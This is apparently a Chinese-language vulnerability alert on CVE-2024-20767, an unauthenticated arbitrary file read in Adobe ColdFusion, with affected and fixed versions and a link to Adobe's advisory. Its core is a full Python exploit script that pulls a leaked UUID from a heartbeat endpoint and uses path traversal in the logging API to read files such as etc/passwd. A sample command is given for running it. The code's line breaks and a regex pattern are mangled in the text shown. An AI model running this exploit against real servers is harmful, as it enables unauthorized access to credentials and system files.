【漏洞预警】Adobe ColdFusion任意文件读取漏洞CVE-2024-20767

cexlife 飓风网络安全 2024-03-27 18:39

漏洞描述:
Adobe ColdFusion,是一个动态Web服务器,Coldfusion最早是由Allaire公司开发的一种应用服务器平台,其运行的CFML（ColdFusionMarkup Language）针对Web应用的一种脚本语言,文件以*.cfm为文件名,在ColdFusion专用的应用服务器环境下运行,近日监测到Adobe ColdFusion存在一个任意文件读取漏洞,未授权的攻击者可以绕过认证访问后台某接口并利用路径遍历来读取服务器上的任意文件,该漏洞是由于Adobe ColdFusion在存在一个接口泄露了uuid,而使用该uuid可访问后台logging模块API,其中未对文件名进行验证过滤,导致可以读取任意文件。

import requestsimport reimport urllib3import argparseurllib3.disable_warnings()parser = argparse.ArgumentParser()parser.add_argument(“-t”, “–target”,required=True, help=”Target Adobe ColdFusion Server URL”)parser.add_argument(“-p”, “–port”,required=False, default=8500, help=”Target Adobe ColdFusion Server Port, by default we use the 8500 Port”)parser.add_argument(“-c”, “–command”, required=True,help=”File to read path”) # Example in Windows Server ‘Windows/ServerStandardEval.xml’ or Linux Server “etc/passwd”args = parser.parse_args()def get_uuid():    endpoint = “/CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat” # Vulnerable endpoint to get the UUID    session = requests.Session()    try:        response = session.get(args.target+”:”+str(args.port)+endpoint, verify=False)        print(“[+] Connecting to ColdFusion Server…”)        repattern = r”(.+?)” # Regex expression to get UUID        uuid = re.findall(repattern, response.text)[0]        print(“[+] UUID Obtained: “, uuid)        return uuid    except:        print(“[-] Error connecting to server”)def exploit(uuid):    headers = {        “uuid”: uuid    }    session = requests.Session()    endpoint2 = “/pms?module=logging&file_name=../../../../../../../”+args.command+”&number_of_lines=100″ # Vulnerable endpoint to read files    response = session.get(args.target+”:”+str(args.port)+endpoint2, verify=False, headers=headers)    if response.status_code == 200 and int(response.headers[“Content-Length”]) > 2:        print(“[+] Succesfully read file!”)        print(response.text)    else:        print(“[-] Something went wrong while reading file or the file doesn’t exist”)if name == “main“:    exploit(get_uuid())

python CVE-2024-20767.py -t http://192.168.124.203 -p 8500 -c Windows/ServerStandardEval.xml
影响版本:Adobe ColdFusion 2021<=Update 12Adobe ColdFusion 2023<=Update 6修复建议:正式防护方案:官方已修复该漏洞，建议用户更新到安全版本安全版本:Adobe ColdFusion 2023 >= Update 7Adobe ColdFusion 2021 >= Update 13 参考链接:https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html